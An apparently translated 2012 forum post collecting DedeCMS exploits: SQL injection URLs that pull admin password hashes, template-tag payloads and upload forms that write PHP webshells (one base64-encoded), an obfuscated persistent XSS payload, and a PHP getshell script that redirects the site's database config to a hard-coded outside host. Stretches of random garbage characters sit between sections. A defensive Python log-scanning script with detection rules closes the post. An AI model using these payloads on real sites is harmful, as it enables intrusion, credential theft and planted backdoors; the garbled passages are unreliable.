DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14

Dedecms 5.6 rss injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member, upload software: in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, creating a one-line shell directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and visit it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-type XSS, so the XSS filter must be disabled.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=""

2. Close the browser; whichever of the URLs below you then visit, our XSS is triggered.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp = Getshell($url, $aid, $path);
// only the first response line is returned, so "OK" is looked for in the status line
if (strpos($exp, "OK") > 12) {
    echo "
Exploit Success \n";
    if ($aid == 1) echo "
Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "
Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "
Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "
Exploit Failed \n";
}

function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    // POST body: doaction plus the _COOKIE[GLOBALS][cfg_db*] override fields
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // raw HTTP/1.1 request assembled by hand and written to a socket
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "
No response from ".$host."\n";
    }
    fwrite($ock, $data);
    while (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;  // returns after the first line of the response
    }
}
?>

# A# A, `7 ]* H# F/ s; v
8 L2 ]' R) k( Z; a. k/ M
1 ?# m) I2 ^4 ~! p2 K& M' W& x+ |2 r/ W" Y- [8 o# B5 M) }

& i$ {1 G1 o: Y7 N3 V' M$ ?3 |% i# M7 ?; [9 e: g9 K1 D

1 f. Z# [3 i$ j2 B5 J' j+ s3 `, J( L' h5 |) @

) M! h, B. d0 x, m+ \0 R/ G0 A( v" x4 n# M
DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you can enter the site backend directly.

The precondition for this vulnerability is that the backend path must be obtained first.
Dedecms 织梦 tag remote file write vulnerability
Precondition: you must prepare your own dede database, then insert data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is at 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
    document.QuickSearch.action = document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our carefully constructed template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(separated by commas)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(colored categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">Content</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

5 ^$ J( T& Z0 u) V
' r8 J: \- l1 Y9 A! j# |' k4 G6 s- P: ?; C7 {' G1 {3 d' M8 D
  P( n0 N0 h. a  b3 N* {

; u$ ~3 C' x, o, p! e, [% e& @1 ^" B* G2 V
9 y; g: @( k: s; \4 a$ U& z5 m- L

- Z1 \5 S  l9 m9 M; d% ^  j4 z3 _( u6 @2 T6 r
7 c3 ~. y, X3 K6 |9 ]
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; then remove 3 from the front and 1 from the end to get the 16-character MD5.

' M! `$ d) Q/ e) g
3 A5 y. V* k7 ?$ h  w  q% p' H; s5 {/ w3 c  k3 t" G

2 A8 K1 ]2 t% \# d- I5 \4 s" l0 _6 \$ t; @) H- j! `  Q2 ]5 D

+ Z! |8 h3 r7 v4 r- k4 H$ M
# n6 |. {$ u7 B! M6 O8 e
! a8 z& X! E8 [! B
' q5 O, e0 U1 e/ _7 J" r5 R
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

# L3 b& |# J- G7 k! ?
# [1 d- O/ X4 @3 z) o! w% A8 q, a( R7 \- Z
2 m2 I) x2 S! h  A3 N! @6 q9 W5 C

3 O1 A: N% X9 A5 Q$ G0 `$ s4 o; b% J$ {6 _( l- K

  n* w4 u: O! S6 {9 n
, ?5 H2 T% o' P3 R7 U) h+ l0 N- x- l! k" ~. ~; Z! W

织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS recording database error messages into a PHP file whose file header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the information from step 2 means the file trojan was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
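From the defender's side, the request patterns listed in this post (GLOBALS/cfg_ variable override, the rss.php and advancedsearch.php injections, the gotopage XSS, the edit_face.php traversal, the UNION injections) can be turned into access-log detection rules. The block below is an added example, not code from the original post; the log lines are constructed samples and the rule names are my own.

```python
"""Detection rules for the DedeCMS request patterns shown in this post.

Added example (not code from the original post): each rule is a regex over the
URL-decoded request path; the log lines in SAMPLE_LOG are constructed samples.
"""
import re
from urllib.parse import unquote_plus

# (rule name, pattern). Patterns are applied to the decoded request path.
RULES = [
    # GLOBALS/cfg_ override through _COOKIE[GLOBALS][cfg_dbhost] and friends
    ("variable-override",
     re.compile(r"_(COOKIE|POST|GET)\[GLOBALS\]|\bGLOBALS\[cfg_", re.I)),
    # error-based injection against plus/rss.php (_Cs[] keys, updatexml())
    ("rss-injection",
     re.compile(r"/plus/rss\.php\?.*(_Cs\[|updatexml\s*\()", re.I)),
    # raw SQL passed to plus/advancedsearch.php in the sql parameter
    ("advancedsearch-sql",
     re.compile(r"/plus/advancedsearch\.php\?.*\bsql=\s*select\b", re.I)),
    # script injection through the gotopage parameter of login.php
    ("gotopage-xss",
     re.compile(r"login\.php\?.*gotopage=[^&]*<script", re.I)),
    # DedeCMS template tags or runphp='yes' smuggled in request parameters
    ("template-tag-in-request",
     re.compile(r"\{dede:[a-z]+[^}]*\}|runphp=['\"]?yes", re.I)),
    # path traversal in the oldface parameter of member/edit_face.php
    ("edit_face-traversal",
     re.compile(r"/member/edit_face\.php\?.*oldface=[^&]*\.\./", re.I)),
    # UNION-based injection against feedback_js.php / infosearch.php
    ("union-select",
     re.compile(r"/plus/(feedback_js|infosearch)\.php\?.*union\s+select", re.I)),
]

# Combined log format: only the request line and status are needed here.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def decode_request(path):
    """URL-decode twice so a double-encoded payload (%2527) is unwrapped too."""
    return unquote_plus(unquote_plus(path))


def scan_log_lines(lines):
    """Return (line_number, rule_name, raw_path) for every matching request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = LOG_RE.search(line)
        if not m:
            continue
        decoded = decode_request(m.group("path"))
        for name, pattern in RULES:
            if pattern.search(decoded):
                hits.append((number, name, m.group("path")))
                break  # one alert per request line
    return hits


# Constructed sample access-log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23 HTTP/1.1" 200 512',
    '203.0.113.7 - - [18/Oct/2012:10:42:15 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [18/Oct/2012:10:42:16 +0800] "GET /dede/login.php?dopost=login&userid=admin&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 302 0',
    '203.0.113.7 - - [18/Oct/2012:10:42:17 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1300',
    '203.0.113.7 - - [18/Oct/2012:10:42:18 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0',
    '198.51.100.2 - - [18/Oct/2012:10:42:19 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 8765',
    '198.51.100.2 - - [18/Oct/2012:10:42:20 +0800] "GET /member/index.php?uid=alice HTTP/1.1" 200 4321',
    '203.0.113.7 - - [18/Oct/2012:10:42:21 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, name, path in scan_log_lines(SAMPLE_LOG):
        print(f"line {number}: {name}: {path}")
```

The rules only see the query string, so the POST-body variants (the mytag_js.php form above) need request-body logging or a WAF rule with the same patterns.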